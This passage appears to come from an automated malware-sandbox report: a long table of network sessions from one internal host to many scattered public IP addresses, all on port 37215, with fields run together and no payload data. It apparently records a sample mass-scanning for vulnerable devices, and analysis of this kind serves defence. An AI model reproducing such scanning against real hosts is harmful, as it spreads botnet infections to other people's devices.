                                                  13128192.168.2.1350260129.36.74.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13129192.168.2.1347186177.49.107.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13130192.168.2.133968238.160.129.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13131192.168.2.1360150164.211.105.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13132192.168.2.1350020157.14.243.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13133192.168.2.1342664157.127.57.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13134192.168.2.135850241.15.238.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13135192.168.2.1345526140.144.25.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13136192.168.2.1360558172.89.239.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13137192.168.2.1352264157.141.1.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13138192.168.2.1347288157.205.237.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13139192.168.2.135759641.95.186.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13140192.168.2.1357480197.92.79.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13141192.168.2.135177841.236.163.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13142192.168.2.1340894157.8.195.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13143192.168.2.135022031.177.28.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13144192.168.2.134754241.95.192.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13145192.168.2.1336010197.125.136.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13146192.168.2.1354828157.133.1.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13147192.168.2.1356842197.216.176.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13148192.168.2.1360124197.110.177.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13149192.168.2.135624441.154.158.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13150192.168.2.133438241.181.241.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13151192.168.2.1355094197.138.66.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13152192.168.2.1354074157.149.56.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13153192.168.2.1351662197.255.81.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13154192.168.2.1351352157.234.49.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13155192.168.2.1337132197.213.202.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13156192.168.2.134185041.53.131.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13157192.168.2.1353618157.77.102.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13158192.168.2.1351832135.111.254.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13159192.168.2.1346326197.242.111.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13160192.168.2.1352370181.235.95.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13161192.168.2.1341800157.88.107.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13162192.168.2.1351112157.134.57.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13163192.168.2.1347308165.50.253.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13164192.168.2.135003241.108.195.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13165192.168.2.1360176157.250.121.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13166192.168.2.1353230157.217.47.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13167192.168.2.1345570197.142.218.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13168192.168.2.1336828197.222.180.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13169192.168.2.1338106197.139.243.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13170192.168.2.134137641.224.57.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13171192.168.2.1354292197.41.146.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13172192.168.2.1333482157.179.165.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13173192.168.2.1342624157.154.11.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13174192.168.2.133551641.88.149.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13175192.168.2.1355650175.97.30.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13176192.168.2.1335700157.207.163.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13177192.168.2.1345090197.208.149.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13178192.168.2.133782841.187.253.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13179192.168.2.1351894157.142.171.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13180192.168.2.1333026197.124.48.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13181192.168.2.1343404197.174.247.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13182192.168.2.136087241.190.133.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13183192.168.2.134856441.223.82.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13184192.168.2.134304841.162.42.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13185192.168.2.1349676197.238.30.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13186192.168.2.1358196197.57.187.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13187192.168.2.1337398197.114.169.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13188192.168.2.1333190173.192.20.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13189192.168.2.135990441.246.52.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13190192.168.2.1340034197.2.35.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13191192.168.2.134970641.212.131.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192192.168.2.1346656157.253.178.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13193192.168.2.1354202147.207.251.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13194192.168.2.1351758197.237.209.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13195192.168.2.135126041.246.214.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13196192.168.2.1345582157.51.3.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13197192.168.2.1344898197.244.53.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13198192.168.2.1347456157.27.224.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13199192.168.2.1333936157.23.51.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13200192.168.2.134049441.143.194.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13201192.168.2.1360518157.112.187.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13202192.168.2.1356118157.123.208.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13203192.168.2.1344204157.224.248.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13204192.168.2.1354936157.96.231.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13205192.168.2.1359652197.126.198.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13206192.168.2.1341370157.182.244.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13207192.168.2.135875041.228.86.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13208192.168.2.133843441.65.228.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13209192.168.2.135572441.209.126.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13210192.168.2.133319441.247.97.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13211192.168.2.1355526157.244.107.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13212192.168.2.134272241.28.200.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13213192.168.2.133843841.6.159.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13214192.168.2.1348928197.34.120.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13215192.168.2.1334066157.255.22.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13216192.168.2.1336714219.166.100.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13217192.168.2.1359684197.240.190.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13218192.168.2.1339086118.136.141.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13219192.168.2.134733441.220.245.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13220192.168.2.1354676157.178.215.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13221192.168.2.133622841.127.87.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13222192.168.2.134901296.36.144.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13223192.168.2.1343836118.31.129.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13224192.168.2.1352016197.165.3.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13225192.168.2.1338798144.76.91.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13226192.168.2.1336004217.162.250.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13227192.168.2.135910841.166.219.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13228192.168.2.1354050139.198.103.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13229192.168.2.1350794197.147.66.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13230192.168.2.134608841.67.0.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13231192.168.2.1341278197.74.177.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13232192.168.2.1347808220.255.198.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13233192.168.2.135899641.42.110.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13234192.168.2.1353288197.249.1.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13235192.168.2.1344456128.170.100.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13236192.168.2.133281041.218.238.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13237192.168.2.1354488157.57.174.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13238192.168.2.1338744157.101.3.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13239192.168.2.1343378197.244.108.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13240192.168.2.1353842157.191.215.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13241192.168.2.1351160197.237.77.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13242192.168.2.134131441.86.208.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13243192.168.2.134855844.251.8.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13244192.168.2.135764641.124.90.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13245192.168.2.135210465.61.34.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13246192.168.2.133581241.66.93.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13247192.168.2.1333824187.21.189.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13248192.168.2.135054641.147.204.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13249192.168.2.1360572222.62.139.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13250192.168.2.1352662157.100.55.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13251192.168.2.1357208157.57.96.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13252192.168.2.1340646157.137.169.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13253192.168.2.134299241.44.190.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13254192.168.2.135676041.186.206.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13255192.168.2.1354772157.49.51.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13256192.168.2.1336418197.62.253.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13257192.168.2.1360196157.88.171.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13258192.168.2.1340820157.19.12.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13259192.168.2.134917020.171.152.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13260192.168.2.1348040133.140.78.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13261192.168.2.1342432114.197.61.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13262192.168.2.1338828197.26.66.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13263192.168.2.134546014.127.52.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13264192.168.2.1339706197.83.216.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13265192.168.2.1352288157.66.61.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13266192.168.2.1354960157.14.91.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13267192.168.2.1346008157.21.245.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13268192.168.2.134466041.14.100.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13269192.168.2.135923241.28.112.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13270192.168.2.1360128157.28.26.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13271192.168.2.1343976197.110.139.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13272192.168.2.1335578157.174.106.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13273192.168.2.135924860.90.91.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13274192.168.2.134740248.62.11.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13275192.168.2.1349612197.68.83.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13276192.168.2.1342976197.142.20.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13277192.168.2.1352716157.138.222.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13278192.168.2.134522641.42.248.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13279192.168.2.133729478.93.186.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13280192.168.2.135773441.201.135.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13281192.168.2.1349720197.20.166.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13282192.168.2.1337238157.177.16.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13283192.168.2.1344078178.4.55.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13284192.168.2.1339790197.101.204.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13285192.168.2.135681441.48.58.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13286192.168.2.1350226197.227.119.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13287192.168.2.1353252197.135.221.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13288192.168.2.133769641.201.39.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13289192.168.2.1333586207.239.59.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13290192.168.2.1351540157.75.236.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13291192.168.2.134380641.58.168.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13292192.168.2.135446814.1.225.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13293192.168.2.1348692157.122.107.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13294192.168.2.133472641.9.203.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13295192.168.2.1351686157.254.218.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13296192.168.2.1351272197.161.89.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13297192.168.2.1358490197.21.198.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13298192.168.2.1342796197.191.196.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13299192.168.2.134388441.7.95.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13300192.168.2.133696096.223.99.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13301192.168.2.134403641.74.132.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13302192.168.2.135929241.146.244.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13303192.168.2.1339870211.171.91.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13304192.168.2.1337738205.228.216.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13305192.168.2.133672641.247.69.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13306192.168.2.1346348157.112.42.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13307192.168.2.134459441.1.106.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13308192.168.2.1340972197.203.254.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13309192.168.2.135751841.179.206.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13310192.168.2.1334618157.227.50.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13311192.168.2.1342656164.237.159.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13312192.168.2.135292664.85.49.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13313192.168.2.1334294197.205.144.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13314192.168.2.1340332197.156.66.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13315192.168.2.1357618197.149.93.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13316192.168.2.1335930197.201.96.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13317192.168.2.1356748197.109.51.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13318192.168.2.133327241.189.29.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13319192.168.2.135846841.215.47.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13320192.168.2.135552441.26.45.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13321192.168.2.1334618157.160.253.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13322192.168.2.1353934157.174.69.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13323192.168.2.1356926197.203.114.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13324192.168.2.1340368157.235.64.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13325192.168.2.1346846181.20.188.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13326192.168.2.13341108.236.82.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13327192.168.2.1348072159.140.225.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13328192.168.2.1349300157.6.177.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13329192.168.2.1336678157.96.255.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13330192.168.2.1351348157.227.122.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13331192.168.2.1351400157.179.205.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13332192.168.2.135303841.168.237.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13333192.168.2.134186641.148.228.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13334192.168.2.136081041.140.35.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13335192.168.2.1335454157.12.189.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13336192.168.2.1333870197.74.120.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13337192.168.2.1334724197.57.188.2037215
